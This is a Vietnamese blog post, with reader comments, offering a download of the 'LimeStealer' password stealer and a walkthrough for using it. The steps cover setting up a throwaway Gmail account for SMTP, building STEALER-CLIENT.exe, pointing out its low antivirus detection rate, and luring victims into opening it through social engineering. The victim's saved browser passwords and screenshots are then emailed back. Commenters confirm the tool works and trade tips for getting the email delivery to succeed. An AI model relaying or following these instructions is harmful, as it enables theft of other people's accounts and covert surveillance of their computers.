LimeStealer là một Keylogger đơn giản có chức năng đánh cắp Password đã lưu trên trình duyệt. Với thói quen cá nhân bạn thường ‘Remember Password’ vào trình duyệt để tiện lần sau không phải nhập lại. Nhưng đây lại là lỗ hỏng để Hacker có thể đánh cắp tất cả tài khoản của bạn. Khi nạn hân kích hoạt LimeStealer, toàn bộ Password bạn đã lưu trên Chrome, Opera, Firefox… đều được gửi về mail Hacker.
Bên cạnh đó LimeStealer có thể chụp lại màn hình và gửi về Email cho bạn. Khi đó bạn vừa biết được Password vừa xem được nạn nhân đang làm gì trên máy tính.
Danh sách các trình duyệt mà LimeStealer có thể lấy được Password:
- Chrome
- Firefox
- Opera
- Yandex
- Vivaldi
- Chromium
- Comodo
- Xpom
- Orbitum
- Kometa
- Amigo
- Nichrom
- Brave
Download Keylogger LimeStealer v.01
Trước tiên, bạn cần tạo cho mình 1 tài khoản Gmail mới để nhận thông tin từ Keylog. Vì khi cấu hình, LimeStealer sẽ yêu cầu bạn nhập User và Password của Gmail. Do đó, để bảo đảm an toàn thì bạn không nên dùng Gmail chính của mình.
(Password: anonyviet.com)
Tải về và giải nén ra, điền thông tin như hình bên dưới:
- Email: gõ rõ ra là @gmail.com luôn. Ví dụ: [email protected]
- Password: là mật khẩu của Email ở trên
- Smtp: giữ nguyên là smtp.gmail.com
Sau đó nhấn nút Build
Khi đó, phần mềm sẽ tạo ra file tên là: STEALER-CLIENT.exe
(Mình dùng Virustotal quét thử thì chỉ có 28/72 trình diệt virus. Khả năng thành công của bạn là khá cao.)
Nhiệm vụ của bạn là gửi file STEALER-CLIENT.exe cho nạn nhân và dụ dỗ họ mở lên. [Phương pháp dụ dỗ tùy vào trình khéo ăn khéo nói của bạn. Đọc thêm các bài về Social Engineering để nghiên cứu nhé.]
Sau khi nạn nhân kích hoạt, Email của bạn sẽ nhận được 1 mail gửi về như hình bên dưới:
Tất cả Password được lưu trên trình duyệt sẽ gửi về Email cho bạn.
Nếu bạn có thể truy cập vào máy nạn nhân được, thì dùng Công cụ giải mã và hack mật khẩu lưu trữ trên Google Chrome hoặc Tool lấy mật khẩu đã lưu trên trình duyệt WebBrowserPassView để xem Password ngay trên máy tính.
Câu hỏi thường gặp
LimeStealer hoạt động như thế nào?
LimeStealer là một keylogger đánh cắp mật khẩu đã lưu trên nhiều trình duyệt phổ biến như Chrome, Firefox, Opera, v.v… Sau khi nạn nhân chạy file STEALER-CLIENT.exe, mật khẩu sẽ được gửi đến email mà bạn đã cấu hình.
Tôi cần làm gì sau khi tải LimeStealer?
Bạn cần tạo một tài khoản Gmail mới, nhập thông tin email và mật khẩu vào phần mềm, nhấn “Build” để tạo file STEALER-CLIENT.exe. Sau đó, bạn cần gửi file này cho nạn nhân và dụ dỗ họ mở nó.
Có an toàn khi sử dụng LimeStealer không?
Việc sử dụng LimeStealer là bất hợp pháp và tiềm ẩn rủi ro cao. Phần mềm này bị một số phần mềm diệt virus phát hiện. Chúng tôi không khuyến khích sử dụng LimeStealer vì mục đích bất hợp pháp.
nếu cài cái này thì dữ liệu của mình có bị ảnh hưởng không anh
muốn test thì thử trên máy ảo nha bạn. Đừng chơi trên máy thật
cảm ơn anh ạ
e hiểu rồi, cảm ơn anh
không có td với máy tạo file à ad?
bạn build xong thì kích hoạt STEALER-CLIENT.exe sẽ tác dụng với máy tạo file :))
dùng trên linux được không ad
windows thôi bạn
Google nó chặn ứng dụng không an toàn truy cập gmail thì làm như nào nhỉ AD
bật tính năng này lên nhé: https://myaccount.google.com/lesssecureapps
check được gmail à anh
anh ơi check pass gmail à anh
sao nó chỉ gởi về tài khoản fb chổ mật khẩu thì trắng ạ ad??
có thể do người dùng ko lưu password
xác nhận với 5 tỷ ace ngoài kia là dùng được nha ,nhớ tắt cái tính năng an toàn của google cho tk trước nhe ,không al2 không gởi mail được ,nó nhanh như điện vậy .
bác chỉ e tắt cái goog với dc k ạ
an toàn ko
keylog mà bạn hỏi an toàn ko thì ai mà trả lời dc
nó gửi về mỗi tài khoản đã lưu thôi hả ad
ko lưu thì ko được à
tài khoản nào đã save password trên chrome thì bị lấy hết
Người khác bung file đã build của mình ra họ thấy dc mail của mình ko anh . Em xác nhận là Keylogger này chạy ổn cho đến bây giờ
còn được không nữa ad